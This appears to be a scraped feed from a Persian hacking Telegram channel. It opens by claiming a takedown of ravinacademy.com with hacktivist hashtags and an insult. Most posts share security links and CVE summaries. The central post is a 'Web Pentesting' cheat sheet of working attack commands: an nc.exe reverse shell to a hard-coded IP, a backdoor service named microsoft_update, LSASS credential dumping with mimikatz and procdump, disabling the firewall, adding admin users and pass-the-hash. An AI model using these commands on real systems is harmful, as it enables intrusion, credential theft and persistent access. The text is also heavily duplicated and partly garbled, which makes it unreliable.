Target : http://ravinacademy.com | Down
Result : https://check-host.net/check-report/d9dd8c0kca3
ای جوجه هکر چاقال :)
Ravinacademy.com hacked
#OpIran
#Mahsa_Amini
@pfksecurity
ای جوجه هکر چاقال :)
Ravinacademy.com hacked
#OpIran
#Mahsa_Amini
@pfksecurity
Checklist - Local Windows Privilege Escalation.
https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation
@pfksecurity
https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation
@pfksecurity
برگه تقلب Nmap - راهنمای مرجع:
https://securitytrails.com/blog/nmap-cheat-sheet
#Nmap #Cheatsheet
@pfksecurity
https://securitytrails.com/blog/nmap-cheat-sheet
#Nmap #Cheatsheet
@pfksecurity
افشای آسیب پذیری - فقط مشترک شوید و با یک کلیک روی هر فروشنده/محصولی، هشدارهای ایمیلی را به محض انتشار یا به روز رسانی CVE دریافت خواهید کرد.
CVE
اعلانها را به گونهای قالببندی میکند که میتوانید به سرعت متوجه شوید که فروشندگان و محصولات تحت تأثیر کدامند.
https://cve.reconshell.com
@PfkSecurity
CVE
اعلانها را به گونهای قالببندی میکند که میتوانید به سرعت متوجه شوید که فروشندگان و محصولات تحت تأثیر کدامند.
https://cve.reconshell.com
@PfkSecurity
CVE-2022-4116 : Quarkus Java framework - Remote Code Execution
https://joebeeton.github.io
#CVE
@PfkSecurity
https://joebeeton.github.io
#CVE
@PfkSecurity
روتکیتهای خارقالعاده: و کجا میتوان آنها را پیدا کرد (قسمت 1)
https://www.cyberark.com/resources/threat-research-blog/fantastic-rootkits-and-where-to-find-them-part-1
مخزن: https://github.com/cyberark/malware-research/tree/master/FantasticRootkits
#rootkit
@Pfksecurity
https://www.cyberark.com/resources/threat-research-blog/fantastic-rootkits-and-where-to-find-them-part-1
مخزن: https://github.com/cyberark/malware-research/tree/master/FantasticRootkits
#rootkit
@Pfksecurity
Cyberark
Fantastic Rootkits: And Where to Find Them (Part 1)
Introduction In this blog series, we will cover the topic of rootkits — how they are built and the basics of kernel driver analysis — specifically on the Windows platform. In this first part, we...
https://portswigger.net/blog/the-burp-challenge
دوتا چالش جدید گذاشته که در این چالش به شما گواهینامه رایگان میده و جایزه های ارزشمند اگر موفق به حل این دو چالش شدید یک رایت اپ بنویسید و پروفایل خودتون برای ما ارسال کنید عضو کانال ctf ما بشید
@PfkCtfbot
@pfksecurity
دوتا چالش جدید گذاشته که در این چالش به شما گواهینامه رایگان میده و جایزه های ارزشمند اگر موفق به حل این دو چالش شدید یک رایت اپ بنویسید و پروفایل خودتون برای ما ارسال کنید عضو کانال ctf ما بشید
@PfkCtfbot
@pfksecurity
PortSwigger Blog
The Burp challenge
We recently launched the Burp challenge, to give our customers a unique opportunity to demonstrate their skills with Burp Suite Professional. Not only that, but the challenges involved put your web vu
WMI Internals
بخش اول ،اصول WMI و نحوه ردیابی فعالیت WMI به فرآیند میزبان ارائه دهنده WMI (WmiPrvse.exe)، فایل اجرایی مسئول اجرای فعالیت WMI را پوشش می دهد. این پست به منظور ارائه اطلاعات مورد نیاز برای درک قسمت 2 این مجموعه است که رابطه بین WMI و COM را پوشش می دهد. همانطور که گفته شد، این پست تمام موارد مربوط به WMI را پوشش نمی دهد - برای مثال، اشتراک رویدادهای دائمی WMI.
قسمت اول 1: https://jsecurity101.medium.com/wmi-internals-part-1-41bb97e7f5eb
قسمت 2: https://jsecurity101.medium.com/wmi-internals-part-2-522f3e97709a
قسمت 3: https://posts.specterops.io/wmi-internals-part-3-38e5dad016be
#WMI
@PfkSecurity
بخش اول ،اصول WMI و نحوه ردیابی فعالیت WMI به فرآیند میزبان ارائه دهنده WMI (WmiPrvse.exe)، فایل اجرایی مسئول اجرای فعالیت WMI را پوشش می دهد. این پست به منظور ارائه اطلاعات مورد نیاز برای درک قسمت 2 این مجموعه است که رابطه بین WMI و COM را پوشش می دهد. همانطور که گفته شد، این پست تمام موارد مربوط به WMI را پوشش نمی دهد - برای مثال، اشتراک رویدادهای دائمی WMI.
قسمت اول 1: https://jsecurity101.medium.com/wmi-internals-part-1-41bb97e7f5eb
قسمت 2: https://jsecurity101.medium.com/wmi-internals-part-2-522f3e97709a
قسمت 3: https://posts.specterops.io/wmi-internals-part-3-38e5dad016be
#WMI
@PfkSecurity
Medium
WMI Internals Part 1
Understanding the Basics
🧪 WEB PENSTING 🧪
Nmap Full Web Vulnerable Scan
Forward remote port to local address
# https://www.offensive-security.com/metasploit-unleashed/portfwd/
# forward remote port to local address
#Web #Pentest
@PfkSecurity
Nmap Full Web Vulnerable Scan
cd /usr/share/nmap/noscripts/
wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz
nmap -sS -sV --noscript=vulscan/vulscan.nse target
nmap -sS -sV --noscript=vulscan/vulscan.nse –noscript-args vulscandb=scipvuldb.csv target
nmap -sS -sV --noscript=vulscan/vulscan.nse –noscript-args vulscandb=scipvuldb.csv -p80 target
nmap -PN -sS -sV --noscript=vulscan –noscript-args vulscancorrelation=1 -p80 target
nmap -sV --noscript=vuln target
nmap -PN -sS -sV --noscript=all –noscript-args vulscancorrelation=1 target
Dirb Dir Bruteforce:dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt
Nikto web server scannernikto -C all -h http://IP
WordPress Scannergit clone https://github.com/wpscanteam/wpscan.git && cd wpscan
./wpscan –url http://IP/ –enumerate p
HTTP Fingerprintingwget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip
cd httprint_301/linux/
./httprint -h http://IP -s signatures.txt
SKIP Fish Scannerskipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP
Nmap Ports Scannmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -f –mtu=24 –data-length=1337 -T2 target ( Randomize scan form diff IP)
nmap -Pn -T2 -sV –randomize-hosts IP1,IP2
nmap –noscript smb-check-vulns.nse -p445 target (using NSE noscripts)
nmap -sU -P0 -T Aggressive -p123 target (Aggresive Scan T1-T5)
nmap -sA -PN -sN target
nmap -sS -sV -T5 -F -A -O target (version detection)
nmap -sU -v target (Udp)
nmap -sU -P0 (Udp)
nmap -sC 192.168.31.10-12 (all scan default)
NC Scanningnc -v -w 1 target -z 1-1000
for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done
Unicornscanus -H -msf -Iv 192.168.56.101 -p 1-65535
us -H -mU -Iv 192.168.56.101 -p 1-65535
-H resolve hostnames during the reporting phase
-m scan mode (sf - tcp, U - udp)
-Iv - verbose
Xprobe2 OS fingerprintingxprobe2 -v -p tcp:80:open IP
Samba Enumerationnmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target
SNMP Enumerationsnmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
Windows Useful cmdsnet localgroup Users
net localgroup Administrators
search dir/s *.doc
system("start cmd.exe /k $cmd")
sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore
/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp For 64 bits
PuTTY Link tunnelForward remote port to local address
plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 IP
Meterpreter portfwd# https://www.offensive-security.com/metasploit-unleashed/portfwd/
# forward remote port to local address
meterpreter > portfwd add –l 3389 –p 3389 –r 172.16.194.141
kali > rdesktop 127.0.0.1:3389
Enable RDP Accessreg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
Turn Off Windows Firewallnetsh firewall set opmode disable
Meterpreter VNC\RDPrun getgui -u admin -p 1234
run vnc -p 5043
Add New user in Windowsnet user test 1234 /add
net localgroup administrators test /add
Mimikatz usegit clone https://github.com/gentilkiwi/mimikatz.git
privilege::debug
sekurlsa::logonPasswords full
Passing the Hashgit clone https://github.com/byt3bl33d3r/pth-toolkit
pth-winexe -U hash //IP cmd
orapt-get install freerdp-x11
xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP#Web #Pentest
@PfkSecurity
OffSec
Portfwd - Metasploit Unleashed
Much like the port forwarding techniques used with an ssh connection, Metasploit's portfwd will relay TCP connections to and from connected machines.
❤️🔥 امیرعماد میرمیرانی(جادی) فعال حوزه تکنولوژی، که دو ماه پیش بازداشت شده بود با قید وثیقه آزاد شد.
به امید آزادی تمامی زندانیان سیاسی
@pfksecurity
به امید آزادی تمامی زندانیان سیاسی
@pfksecurity
Powershell anti-kill obfuscator, simple and effective. A simple and effective powershell obfuscaiton tool bypass Anti-Virus
https://github.com/H4de5-7/powershell-obfuscation
@pfksecurity
https://github.com/H4de5-7/powershell-obfuscation
@pfksecurity
CVE-2022-27775
آسیبپذیری افشای اطلاعات در curl 7.65.0 تا 7.82.0 آسیبپذیر است که با استفاده از یک آدرس IPv6 که در مخزن اتصال بود اما با شناسه اسکوپ متفاوت، میتوان از اتصال مجدد استفاده کرد.
#cve
@pfksecurity
آسیبپذیری افشای اطلاعات در curl 7.65.0 تا 7.82.0 آسیبپذیر است که با استفاده از یک آدرس IPv6 که در مخزن اتصال بود اما با شناسه اسکوپ متفاوت، میتوان از اتصال مجدد استفاده کرد.
#cve
@pfksecurity
HackerOne
curl disclosed on HackerOne: CVE-2022-27775: Bad local IPv6...
## Summary:
Curl doesn't consider IPv6 address zone index when doing connection reuse. if connection exists to specific IPv6 address (and other conditions for connection reuse are fulfilled) it...
Curl doesn't consider IPv6 address zone index when doing connection reuse. if connection exists to specific IPv6 address (and other conditions for connection reuse are fulfilled) it...
CVE-2022-3481
افزونه WooCommerce Dropshipping وردپرس قبل از نسخه 4.4 قبل از استفاده از آن در یک دستور SQL از طریق یک نقطه پایانی REST در دسترس کاربران احراز هویت نشده، به درستی پاکسازی نمیکند و از یک پارامتر فرار نمیکند و منجر به تزریق SQL میشود.
#CVE
@pfksecurity
افزونه WooCommerce Dropshipping وردپرس قبل از نسخه 4.4 قبل از استفاده از آن در یک دستور SQL از طریق یک نقطه پایانی REST در دسترس کاربران احراز هویت نشده، به درستی پاکسازی نمیکند و از یک پارامتر فرار نمیکند و منجر به تزریق SQL میشود.
#CVE
@pfksecurity
WPScan
WooCommerce Dropshipping < 4.4 - Unauthenticated SQLi
See details on WooCommerce Dropshipping < 4.4 - Unauthenticated SQLi CVE 2022-3481. View the latest Plugin Vulnerabilities on WPScan.